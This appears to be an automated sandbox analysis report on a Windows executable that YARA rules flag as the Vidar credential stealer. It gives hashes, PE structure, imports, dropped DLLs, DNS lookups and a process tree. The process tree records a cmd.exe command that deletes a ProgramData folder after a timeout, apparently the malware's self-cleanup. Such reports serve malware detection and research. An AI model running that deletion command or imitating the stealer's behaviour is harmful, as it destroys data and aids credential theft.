                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):2046288
                    Entropy (8bit):6.787733948558952
                    Encrypted:false
                    SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                    MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                    SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                    SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                    SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):257872
                    Entropy (8bit):6.727482641240852
                    Encrypted:false
                    SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                    MD5:4E52D739C324DB8225BD9AB2695F262F
                    SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                    SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                    SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................
                    Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):80880
                    Entropy (8bit):6.920480786566406
                    Encrypted:false
                    SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                    MD5:A37EE36B536409056A86F50E67777DD7
                    SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                    SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                    SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    File type:PE32 executable (console) Intel 80386, for MS Windows
                    Entropy (8bit):7.529756734354945
                    TrID:
                    • Win32 Executable (generic) a (10002005/4) 99.96%
                    • Generic Win/DOS Executable (2004/3) 0.02%
                    • DOS Executable Generic (2002/1) 0.02%
                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                    File name:file.exe
                    File size:382'976 bytes
                    MD5:b580ff2d001291bf58bdd23a058ef21b
                    SHA1:5013dc6e38bd9d1cbe2f7fc0d983b6812f3f2351
                    SHA256:80994b791b545ba6a8c906e046ab6ae79c5875a4f42da07085113b4b6f22f8ca
                    SHA512:85643ff028ffa0d7c6e7b3dd69c9316aed5e6c15c364bfdb14ec65ca9859ee8fb2ae04e3990c2275671da27abb727a9505f2acf5453a4bb1a3f4df0664df603b
                    SSDEEP:6144:3hp+scz0+j/2LXudxnOqC3dFxYkBY8EdltIPaiTeUkHjUP6PiLNwETfeuBMbxFr9:3SscQu/CLtF3BY87PFi7HJAwETfhMlF5
                    TLSH:6684E051B4C1C032D433153A49F4DBB85E7EB9600AA69A9FBB940F7F4F312C1D621A6B
                    Icon Hash:90cececece8e8eb0
                    Entrypoint:0x4072d9
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows cui
                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                    Time Stamp:0x6644F62C [Wed May 15 17:51:40 2024 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:
                    OS Version Major:6
                    OS Version Minor:0
                    File Version Major:6
                    File Version Minor:0
                    Subsystem Version Major:6
                    Subsystem Version Minor:0
                    Import Hash:81b834f6f9db0b945bd836f537996a1f
                    Name                                  Virtual Address  Virtual Size  Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT          0x291c8          0x64          .rdata
                    IMAGE_DIRECTORY_ENTRY_RESOURCE        0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5f000          0x1d14        .reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG           0x27280          0x1c          .rdata
                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x271c0          0x40          .rdata
                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_IAT             0x20000          0x174         .rdata
                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                    IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
                    Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy             Characteristics
                    .text   0x1000           0x1e2ab       0x1e400   6aaddd29a7b1d14c04fafe4373874165  False     0.5765996255165289  data       6.591179392915493   IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    .rdata  0x20000          0x9a58        0x9c00    c0d3af8d875e80d0742331423512f2ce  False     0.3869941907051282  data       4.658571126756863   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                    .data   0x2a000          0x34654       0x33600   2cb86b6c8671c22ce21f5d03dfb1e373  False     0.9822270377128953  data       7.9818411522888875  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                    .reloc  0x5f000          0x1d14        0x1e00    45d81991a944a5e251cf5f207dbbc2a5  False     0.7373697916666667  data       6.468270351939864   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                    DLL           Import
                    GDI32.dll     GetClipBox
                    USER32.dll    PostQuitMessage
                    ADVAPI32.dll  CryptDecrypt
                    KERNEL32.dll  HeapSize, CreateFileW, VirtualAlloc, WaitForSingleObject, GetModuleHandleA, FreeConsole, CreateThread, GetProcAddress, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, GetCurrentThreadId, CloseHandle, WaitForSingleObjectEx, GetExitCodeThread, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, ReleaseSRWLockExclusive, WakeAllConditionVariable, QueryPerformanceCounter, GetSystemTimeAsFileTime, GetModuleHandleW, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, GetCurrentProcessId, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetProcessHeap, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetCommandLineA, GetCommandLineW, HeapAlloc, HeapFree, CompareStringW, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW
                    Timestamp                           Source Port  Dest Port  Source IP    Dest IP
                    May 15, 2024 20:35:50.009427071 CEST  58223        53         192.168.2.4  1.1.1.1
                    May 15, 2024 20:35:50.120599031 CEST  53           58223      1.1.1.1      192.168.2.4

                    Timestamp                           Source IP    Dest IP  Trans ID  OP Code             Name                Type            Class        DNS over HTTPS
                    May 15, 2024 20:35:50.009427071 CEST  192.168.2.4  1.1.1.1  0xbd2     Standard query (0)  steamcommunity.com  A (IP address)  IN (0x0001)  false

                    Timestamp                           Source IP  Dest IP      Trans ID  Reply Code    Name                CName  Address         Type            Class        DNS over HTTPS
                    May 15, 2024 20:35:50.120599031 CEST  1.1.1.1    192.168.2.4  0xbd2     No error (0)  steamcommunity.com         23.194.234.100  A (IP address)  IN (0x0001)  false
                    • steamcommunity.com
                    • 95.217.240.101


                    Target ID:0
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Users\user\Desktop\file.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Users\user\Desktop\file.exe"
                    Imagebase:0x6e0000
                    File size:382'976 bytes
                    MD5 hash:B580FF2D001291BF58BDD23A058EF21B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1589701895.000000000070A000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security
                    Reputation:low
                    Has exited:true

                    Target ID:1
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:2
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):false
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Imagebase:0x4e0000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:3
                    Start time:20:35:49
                    Start date:15/05/2024
                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Imagebase:0x910000
                    File size:65'440 bytes
                    MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Yara matches:
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000003.00000002.2039421679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2039421679.0000000000572000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                    • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2039843290.0000000000EF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                    Reputation:high
                    Has exited:true

                    Target ID:7
                    Start time:20:36:34
                    Start date:15/05/2024
                    Path:C:\Windows\SysWOW64\cmd.exe
                    Wow64 process (32bit):true
                    Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\GHIJJEGDBFII" & exit
                    Imagebase:0x7ff72bec0000
                    File size:236'544 bytes
                    MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:8
                    Start time:20:36:34
                    Start date:15/05/2024
                    Path:C:\Windows\System32\conhost.exe
                    Wow64 process (32bit):false
                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Imagebase:0x7ff7699e0000
                    File size:862'208 bytes
                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    Target ID:9
                    Start time:20:36:34
                    Start date:15/05/2024
                    Path:C:\Windows\SysWOW64\timeout.exe
                    Wow64 process (32bit):true
                    Commandline:timeout /t 10
                    Imagebase:0xd00000
                    File size:25'088 bytes
                    MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high
                    Has exited:true

                    No disassembly